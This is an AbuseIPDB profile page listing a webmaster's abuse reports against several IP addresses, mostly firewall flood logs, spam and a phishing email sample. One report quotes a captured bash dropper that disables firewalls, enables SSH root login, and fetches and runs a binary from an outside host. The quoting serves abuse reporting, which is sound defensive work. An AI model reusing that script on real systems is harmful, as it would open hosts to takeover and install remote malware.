Check an IP Address, Domain Name, or Subnet
e.g. 35.170.82.159 , microsoft.com , or 5.188.10.0/24
User cclmed, the webmaster of cclmed.ro ,
joined AbuseIPDB in November 2020 and has reported 10 IP addresses.
Standing (weight) is
good.
INACTIVE USER
WEBMASTER
SUPPORTER
IP
Date
Comment
Categories
185.53.199.57
20 Aug 2021
2021-08-20T04:30:30+03:00 <warning>kernel: [1596276.584726] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DS ... show more 2021-08-20T04:30:30+03:00 <warning>kernel: [1596276.584726] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=185.53.199.57 DST=86.123.254.215 LEN=124 TOS=0x18 PREC=0x20 TTL=51 ID=5681 DF PROTO=UDP SPT=9140 DPT=61724 LEN=104 MARK=0xff00
2021-08-20T04:30:30+03:00 <warning>kernel: [1596276.585386] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=185.53.199.57 DST=86.123.254.215 LEN=124 TOS=0x18 PREC=0x20 TTL=51 ID=5680 DF PROTO=UDP SPT=8577 DPT=63296 LEN=104 MARK=0xff00 show less
DDoS Attack
Port Scan
103.100.143.47
08 Aug 2021
#!/bin/bash
#chkconfig: 2345 88 14
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/loca ... show more #!/bin/bash
#chkconfig: 2345 88 14
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function downloadyam() {
/etc/init.d/iptables stop
service iptables stop
sUsEFirewall2 stopresUsEFirewall2 stop
systemctl stop firewalld.service
systemctl disable firewalld.service
sed -i '/nameserver*/d' /etc/resolv.conf
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
needreset=1;
iptables -I INPUT -p TCP --dport 1522 -j ACCEPT
iptables -I INPUT -p TCP --dport 3307 -j ACCEPT
iptables -I INPUT -p TCP --dport 6001 -j ACCEPT
sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
sed -i '/PermitRootLogin*/d' /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
if [ ! -f "/bin/note" ]; then
curl http://xia.beihaixue.com/s666.png -o /bin/note && chmod 0777 /bin/note
if [ ! -f "/bin/note" ]; then
wget http://xia.beihaixue.com/s666.png -O /bin/note && chmod 0777 /bin/note
rm -rf note.*
fi
nohup /bin/note & show less
Phishing
Hacking
Exploited Host
SSH
106.75.34.62
26 Jun 2021
Unusual sign-in activity
We detected something unusual about a recent sign-in to the effybiz. ... show more Unusual sign-in activity
We detected something unusual about a recent sign-in to the effybiz.com account [email protected]
Sign-in details
Country/region: Singapore
IP address: 92.922.140.701
Date: 2021-06-21 8:41:59 GMT (SG)
Platform: iOS
Browser: - Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0)
Please go to your recent activity page to let us know whether or not this was you. If this wasn't you, we'll help you to secure your account. If this was you, we'll trust similar activity in the future. show less
Email Spam
103.145.13.223
07 Jun 2021
2021-06-07T04:29:05+03:00 <warning>kernel: [1513982.263667] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DS ... show more 2021-06-07T04:29:05+03:00 <warning>kernel: [1513982.263667] FIREWALL UDP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=103.145.13.223 DST=86.123.254.215 LEN=429 TOS=0x08 PREC=0x20 TTL=53 ID=24028 DF PROTO=UDP SPT=5097 DPT=5382 LEN=409 MARK=0xff00 show less
DDoS Attack
Port Scan
81.211.5.146
10 May 2021
2021-05-04T00:42:23+03:00 <warning>kernel: [1068017.733040] FIREWALL ICMP-FLOOD:IN=ppoe-wan1p OUT= D ... show more 2021-05-04T00:42:23+03:00 <warning>kernel: [1068017.733040] FIREWALL ICMP-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=81.211.5.146 DST=86.123.254.215 LEN=56 TOS=0x00 PREC=0x00 TTL=249 ID=0 PROTO=ICMP TYPE=11 CODE=0 [SRC=86.123.254.215 DST=91.243.35.12 LEN=41 TOS=0x00 PREC=0x00 TTL=1 ID=54575 DF PROTO=UDP SPT=19046 DPT=7777 LEN=21 ] MARK=0xff00
Numerous ICMP flood attacks show less
DDoS Attack
Ping of Death
Exploited Host
51.195.190.14
10 May 2021
2021-05-10T00:48:35+03:00 <warning>kernel: [1586805.515996] FIREWALL SYN-FLOOD:IN=ppoe-wan1p OUT= DS ... show more 2021-05-10T00:48:35+03:00 <warning>kernel: [1586805.515996] FIREWALL SYN-FLOOD:IN=ppoe-wan1p OUT= DST_MAC= SRC=51.195.190.14 DST=86.123.254.215 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=24481 PROTO=TCP SPT=56914 DPT=8430 WINDOW=1024 RES=0x00 SYN URGP=0 MARK=0xff00
This repeats multiple times per second at the main gateway show less
DDoS Attack
Exploited Host
162.241.149.137
16 Feb 2021
162.241.149.137 - - [16/Feb/2021:08:33:30 +0200] "GET /wp-login.php HTTP/1.1" 404 6568 "http://cclme ... show more 162.241.149.137 - - [16/Feb/2021:08:33:30 +0200] "GET /wp-login.php HTTP/1.1" 404 6568 "http://cclmed.ro/wp-login.php" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" show less
Web App Attack
63.80.191.81
30 Nov 2020
Continuous unsolicited marketing email for various products (possibly scam)
Email Spam
178.20.226.92
30 Nov 2020
Continuous unsolicited marketing emails for various products
Email Spam